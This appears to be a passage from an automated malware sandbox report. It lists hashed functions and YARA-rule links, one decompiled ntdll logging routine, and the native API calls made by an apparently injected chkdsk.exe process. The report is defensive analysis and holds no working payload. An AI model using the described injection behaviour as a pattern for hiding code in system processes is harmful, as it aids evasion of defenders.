                                            • Instruction Fuzzy Hash: 569002A1611140834640B16958044065015A7E1342791D131B0444560CC6A88865E2A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A295F0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b080974b78c8a158c1dcbe19440bc48c9f67801a80ed610d37a11ef9cb0347b
                                            • Instruction ID: cdc47c17eb7e3af32ffe98e7ad78fb7e825dec2d1a63c3be4bed942258f33bf5
                                            • Opcode Fuzzy Hash: 4b080974b78c8a158c1dcbe19440bc48c9f67801a80ed610d37a11ef9cb0347b
                                            • Instruction Fuzzy Hash: 4590027121100842D20461695804686000597D0342F51D021B6014655ED6A588A1B171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A299D0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9bad995cf343491b5d518dd3250fd1b6315584fb6aad13cc0931a1b36776192b
                                            • Instruction ID: 461ac2054de609563eba3da2ab13e6b9c88ac7c79f26918b89d61e1b5b0613ac
                                            • Opcode Fuzzy Hash: 9bad995cf343491b5d518dd3250fd1b6315584fb6aad13cc0931a1b36776192b
                                            • Instruction Fuzzy Hash: 449002A122100082D20461695404706004597E1342F51D022B2144554CC5698C71A165
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29520, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f218cf5a67f9e267f0f2c54e4b7998ea9c76f6960a8ecad15c1d7783ef651654
                                            • Instruction ID: c3a4e59165bb1cfd9651c5db2e65c8204cfafaffc55937708827c7f2fa9e4519
                                            • Opcode Fuzzy Hash: f218cf5a67f9e267f0f2c54e4b7998ea9c76f6960a8ecad15c1d7783ef651654
                                            • Instruction Fuzzy Hash: 479002E1211140D24600A2699404B0A450597E0342F51D026F1044560CC5658861E175
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A2AD30, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e221dec8810734be87c337c41cae2373cb67d76f5dedc83528ceabef4719d75b
                                            • Instruction ID: d5a649f90e2217b645b60e81489f0c9fa0dabcfd43bcf22c2c7f33de4fdfe7ec
                                            • Opcode Fuzzy Hash: e221dec8810734be87c337c41cae2373cb67d76f5dedc83528ceabef4719d75b
                                            • Instruction Fuzzy Hash: DF900271A15000529240716958146464006A7E0782F55D021B0504554CC9948A65A3E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29560, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c9dc95583015ba26b79d1f48c1b7913a92f24530c534af26380d190af848b968
                                            • Instruction ID: 88d313cbbc48bb387848d8124f7d07219a2326397c1054d2054d3b51c0f96661
                                            • Opcode Fuzzy Hash: c9dc95583015ba26b79d1f48c1b7913a92f24530c534af26380d190af848b968
                                            • Instruction Fuzzy Hash: F3900265231000420245A569160450B0445A7D6392791D025F1406590CC6618875A361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29950, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8749658355800040322b73e1c9c278acde51cba1456138f90cb18ebf14710296
                                            • Instruction ID: 634afb5ba80719d435eb7329ffe9549410d2d56759ab8111d3033557ccb436f4
                                            • Opcode Fuzzy Hash: 8749658355800040322b73e1c9c278acde51cba1456138f90cb18ebf14710296
                                            • Instruction Fuzzy Hash: 959002A121140443D24065695804607000597D0343F51D021B2054555ECA698C61B175
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29A80, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0fa9bd0c13e3befc94f5050fe9feaa13557cd02caa8e5ba01af244e3d93dc0db
                                            • Instruction ID: 30d200857ee8fc2acc604009912f2f43a21844d5dcde93fe0ddaa4093df28f48
                                            • Opcode Fuzzy Hash: 0fa9bd0c13e3befc94f5050fe9feaa13557cd02caa8e5ba01af244e3d93dc0db
                                            • Instruction Fuzzy Hash: EA90026121144482D24062695804B0F410597E1343F91D029B4146554CC9558865A761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A296D0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e00c59a42a699ddd8b65483b674901ac25913b7dc6dd7e05dcf0c387a1e77ecb
                                            • Instruction ID: 58033d7f98d1b60aa740ead1afafd0e9256d116ac136a58c7e365a856984d042
                                            • Opcode Fuzzy Hash: e00c59a42a699ddd8b65483b674901ac25913b7dc6dd7e05dcf0c387a1e77ecb
                                            • Instruction Fuzzy Hash: DA90027121100882D20061695404B46000597E0342F51D026B0114654DC655C861B561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29A10, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4741bb99e465c8fc92c9bf73d8a6baaf0161ac1601354822344458e9f605f2ce
                                            • Instruction ID: b30f15eb9f0da88696f42aaf7003100224571150e13d2cfae9b3460935fdaf02
                                            • Opcode Fuzzy Hash: 4741bb99e465c8fc92c9bf73d8a6baaf0161ac1601354822344458e9f605f2ce
                                            • Instruction Fuzzy Hash: 9790027121140442D20061695808747000597D0343F51D021B5154555EC6A5C8A1B571
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29610, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2ba5cd881c122d3ac83adc4c0e3992cb956fa02038d7e93e82f9336d28ac6c73
                                            • Instruction ID: 7a791d9259e2e293785f79c5dc14f5551cb1e3bb9eb732098c8077bd9e179512
                                            • Opcode Fuzzy Hash: 2ba5cd881c122d3ac83adc4c0e3992cb956fa02038d7e93e82f9336d28ac6c73
                                            • Instruction Fuzzy Hash: C790027161500842D25071695414746000597D0342F51D021B0014654DC7958A65B6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29650, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3689a19cb9b7ab6e0eac93487efe107fb849d87b286fda3ae871b85b1f29df9e
                                            • Instruction ID: dca77a5e81f101ac3e56e5004acb83d33bb4d3fbed8424cbaf343e0a17c79658
                                            • Opcode Fuzzy Hash: 3689a19cb9b7ab6e0eac93487efe107fb849d87b286fda3ae871b85b1f29df9e
                                            • Instruction Fuzzy Hash: D890027121504882D24071695404A46001597D0346F51D021B0054694DD6658D65F6A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A2A3B0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c0673617d80a3a7653cdf54b5bf9a33372423e9e22b54cd0d551b2736bcc48f8
                                            • Instruction ID: a9408d2d006d566ac0f458e8a2285b03fe11cdd326ab29399c90ce99ea20d15f
                                            • Opcode Fuzzy Hash: c0673617d80a3a7653cdf54b5bf9a33372423e9e22b54cd0d551b2736bcc48f8
                                            • Instruction Fuzzy Hash: 3690027121144042D2407169944460B5005A7E0342F51D421F0415554CC6558866E261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29FE0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f93c05ab3930df8011cc19e2ca6c597b0c9e0730e67325ecbeb6f2d00cc26278
                                            • Instruction ID: e53eeb4bad8babaa9b63d5785c5fc4a05f4eef394cd11a09c56404b36accd684
                                            • Opcode Fuzzy Hash: f93c05ab3930df8011cc19e2ca6c597b0c9e0730e67325ecbeb6f2d00cc26278
                                            • Instruction Fuzzy Hash: 2B90027132114442D21061699404706000597D1342F51D421B0814558DC6D588A1B162
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29730, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b8917a14c576201641a2da2d80daa4b6c3ed90dc8d451da82f09ebfd04c5c702
                                            • Instruction ID: b0985335340f4111ce3ad64b8edaba112fd36d8b6e9bce620c9411c5f4956e8e
                                            • Opcode Fuzzy Hash: b8917a14c576201641a2da2d80daa4b6c3ed90dc8d451da82f09ebfd04c5c702
                                            • Instruction Fuzzy Hash: A190026161500442D24071696418706001597D0342F51E021B0014554DC6998A65B6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29B00, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9de8a8d3112d1e11ea477d11abfbdf41f5b66f722a3b32902895a99086e540c0
                                            • Instruction ID: 3ca9b87c567da8deca3e191ac896c65c3e861194dff2351daecd4b269f48eb60
                                            • Opcode Fuzzy Hash: 9de8a8d3112d1e11ea477d11abfbdf41f5b66f722a3b32902895a99086e540c0
                                            • Instruction Fuzzy Hash: 1790026125100842D240716994147070006D7D0742F51D021B0014554DC6568975B6F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A2A710, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6b5f9c76238483c0ee5d46ea2b6489dbd52ab509f85e599420c5439311a396de
                                            • Instruction ID: 51e51ea4a05065a9693225010ec7c7fda0cb801d0d001338c3074e3345eadf3c
                                            • Opcode Fuzzy Hash: 6b5f9c76238483c0ee5d46ea2b6489dbd52ab509f85e599420c5439311a396de
                                            • Instruction Fuzzy Hash: 22900271311000929600A6A96804A4A410597F0342F51E025B4004554CC5948871A161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29760, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4405254ebcaba8fd17f11fcb82dc56c5dc365ea9ec4203c837278233cc0f3de5
                                            • Instruction ID: 98bd6f5a0c67977cc344b4d0e86cef3e958255e05858bb21b61fc0693ad9cece
                                            • Opcode Fuzzy Hash: 4405254ebcaba8fd17f11fcb82dc56c5dc365ea9ec4203c837278233cc0f3de5
                                            • Instruction Fuzzy Hash: 6590027121100443D20061696508707000597D0342F51E421B0414558DD6968861B161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29770, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 080eeaebb8c78dd77d3e0922e0881a767f5928c816c1dd225868650ed376f89b
                                            • Instruction ID: c9ca4c14c62dab5ceb4648514fff346d99ff6a5792fe774a1e3363163a8ed02f
                                            • Opcode Fuzzy Hash: 080eeaebb8c78dd77d3e0922e0881a767f5928c816c1dd225868650ed376f89b
                                            • Instruction Fuzzy Hash: DD90026121504482D20065696408A06000597D0346F51E021B1054595DC6758861F171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A2A770, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a8c948bb69a67095e3a1493f82ef8fed94ac5dbee5cefd43a4e689762ca6cfdb
                                            • Instruction ID: a0782fea75cf03e07e68d1630232048781ec485acb2ce5f281b06d1cf94aa47c
                                            • Opcode Fuzzy Hash: a8c948bb69a67095e3a1493f82ef8fed94ac5dbee5cefd43a4e689762ca6cfdb
                                            • Instruction Fuzzy Hash: 7690027521504482D60065696804A87000597D0346F51E421B041459CDC6948871F161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A29670, Relevance: .0, Instructions: 2COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: f8c46b5b903e7e891c1a59c77e2e55a87bea8a9ed6a1326f8c85d08c412e7983
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A7FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E00A7FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A2CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00A75720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00A75720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                            0x00a7fdda
                                            0x00a7fde2
                                            0x00a7fde5
                                            0x00a7fdec
                                            0x00a7fdfa
                                            0x00a7fdff
                                            0x00a7fe0a
                                            0x00a7fe0f
                                            0x00a7fe17
                                            0x00a7fe1e
                                            0x00a7fe19
                                            0x00a7fe19
                                            0x00a7fe19
                                            0x00a7fe20
                                            0x00a7fe21
                                            0x00a7fe22
                                            0x00a7fe25
                                            0x00a7fe40

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A7FDFA
                                            Strings
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A7FE2B
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A7FE01
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.281498615.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: 7e6ca2958345812976de64821de685f8295b1c022727ee24c9699d3948fe9db5
                                            • Instruction ID: b0b65e2aff501b94627cc11b22b82ebca0d5c5f5b16974e166a8aead0f794602
                                            • Opcode Fuzzy Hash: 7e6ca2958345812976de64821de685f8295b1c022727ee24c9699d3948fe9db5
                                            • Instruction Fuzzy Hash: AEF0F632640601BFDA241B55DD02F23BB6AEB84730F24C315F628565E1DAA2FD2096F4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: chkdsk.exe PID: 1716 Parent PID: 3472 chkdsk.exeCOMMON

                                            Executed Functions

                                            Function 04B49D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.00000008.00000002.496329933.0000000004E80000.00000040.00000001.(00000060,00000000,.z`,04B44B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04B44B87,007A002E,00000000,00000060,00000000,00000000), ref: 04B49DAD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateE80000.00000040.00000001File.00000008.00000002.496329933.0000000004
                                            • String ID: .z`
                                            • API String ID: 1185000145-1441809116
                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction ID: 743fc6c66073b3cb74950afddc07bbac6b16a4864de22b048f60abdd2e1155b5
                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction Fuzzy Hash: 66F0B2B2200208ABDB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630F8118BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04B49DB3, Relevance: 1.6, APIs: 1, Instructions: 82filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(04B44D42,5EB6522D,FFFFFFFF,04B44A01,?,?,04B44D42,?,04B44A01,FFFFFFFF,5EB6522D,04B44D42,?,00000000), ref: 04B49E55
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: c9fe3cb5746154e00976b420beeb99fa5d73d9be8d8d481014db7f636c3b6ccd
                                            • Instruction ID: 1394bdbcbdca9b5a95337ec9240028ca6e3623a00766a72d2233097786b084d1
                                            • Opcode Fuzzy Hash: c9fe3cb5746154e00976b420beeb99fa5d73d9be8d8d481014db7f636c3b6ccd
                                            • Instruction Fuzzy Hash: 3F210CB5200108AFDB18CFA9DC84DEB77A9EF8C754F158688FA5DA7241C630E911CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04B49E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(04B44D42,5EB6522D,FFFFFFFF,04B44A01,?,?,04B44D42,?,04B44A01,FFFFFFFF,5EB6522D,04B44D42,?,00000000), ref: 04B49E55
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction ID: 79b9a5e5418569cb103902766ac1a2348fb9122cbe5623805c9323d829a98128
                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction Fuzzy Hash: 53F0A4B2200208ABDB14DF89DC80EEB77ADEF8C754F158248BA1DA7241D630E8118BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04B49F3B, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.00000008.00000002.496329933.0000000004E80000.00000040.00000001.(00000004,00003000,00002000,00000000,?,04B32D11,00002000,00003000,00000004), ref: 04B49F79
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateE80000.00000040.00000001Memory.00000008.00000002.496329933.0000000004Virtual
                                            • String ID:
                                            • API String ID: 2325560688-0
                                            • Opcode ID: e5c3ea1366514298fb34d4273b271c36ac2d5c9f7de83dd42f23b401c9690e4f
                                            • Instruction ID: fd17797e04e5054ab510cbd65bebb34b35c7a80ccf6a05be0703aaf6c3784d5a
                                            • Opcode Fuzzy Hash: e5c3ea1366514298fb34d4273b271c36ac2d5c9f7de83dd42f23b401c9690e4f
                                            • Instruction Fuzzy Hash: 87F08CB6200208AFDB14DF88CC80EE777ACEF8C614F118189FE08A7241C230E811CBE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04B49F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.00000008.00000002.496329933.0000000004E80000.00000040.00000001.(00000004,00003000,00002000,00000000,?,04B32D11,00002000,00003000,00000004), ref: 04B49F79
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateE80000.00000040.00000001Memory.00000008.00000002.496329933.0000000004Virtual
                                            • String ID:
                                            • API String ID: 2325560688-0
                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction ID: 1b8c1df2045f0f2d856ba6053b5a9a5b73e751aab1ee0558409c0985c0b157d3
                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction Fuzzy Hash: B9F015B2200208ABDB14DF89CC80EAB77ADEF8C654F118148BE08A7241C630F810CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04B49E8A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.00000008.00000002.496329933.0000000004E80000.00000040.00000001.(04B44D20,?,?,04B44D20,00000000,FFFFFFFF), ref: 04B49EB5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Close.00000008.00000002.496329933.0000000004E80000.00000040.00000001
                                            • String ID:
                                            • API String ID: 2550380592-0
                                            • Opcode ID: 231ffaeeda2b3ef2d3a159ffa64b92375b1e8e2d7fe79bf11f7637a83fb73f97
                                            • Instruction ID: e5875a53ff10042ea13f791e9457597cacf30c5c60e8143a69c98dd9dc73a0b4
                                            • Opcode Fuzzy Hash: 231ffaeeda2b3ef2d3a159ffa64b92375b1e8e2d7fe79bf11f7637a83fb73f97
                                            • Instruction Fuzzy Hash: 19E08C39200200AFE710DBD4CC85EEB3B28EF48650F154499FA685B241C130A5008BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04B49E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.00000008.00000002.496329933.0000000004E80000.00000040.00000001.(04B44D20,?,?,04B44D20,00000000,FFFFFFFF), ref: 04B49EB5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Close.00000008.00000002.496329933.0000000004E80000.00000040.00000001
                                            • String ID:
                                            • API String ID: 2550380592-0
                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction ID: c50ff893d2b53cc6406460a6d7294767c361eef3b048c14c74069925f4f22c1a
                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction Fuzzy Hash: 6DD012752402147BE710EBD8CC85E97775CEF48A50F154495BA585B241C530F50086E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04B4A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.00000008.00000002.496329933.0000000004E80000.00000040.00000001.(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,04B33AF8), ref: 04B4A09D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: E80000.00000040.00000001FreeHeap.00000008.00000002.496329933.0000000004
                                            • String ID: .z`
                                            • API String ID: 2611349190-1441809116
                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction ID: cfee8d29ed692d7893c801170878f358a63ad16e9442d228ebe998a2e293bd00
                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction Fuzzy Hash: 85E04FB12002087BD714DF99CC44EA777ACEF88750F018554FD0857241C630F910CAF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04B382E8, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04B3834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04B3836B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Offset: 04B30000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: b2e1ccf1cab520e8dba0df0ad2e90310ff53d3651b42f1c39db5f2c11554db28
                                            • Instruction ID: 6036f90c138f2d9c8f04d713e1e31dc9d48494854591506072d2a7e0112c801c
                                            • Opcode Fuzzy Hash: b2e1ccf1cab520e8dba0df0ad2e90310ff53d3651b42f1c39db5f2c11554db28
                                            • Instruction Fuzzy Hash: A0012431A802287AF720A6999D42FBE376CEB40F16F140189FB04FA1C0D7A47A0642E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04B382F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04B3834A
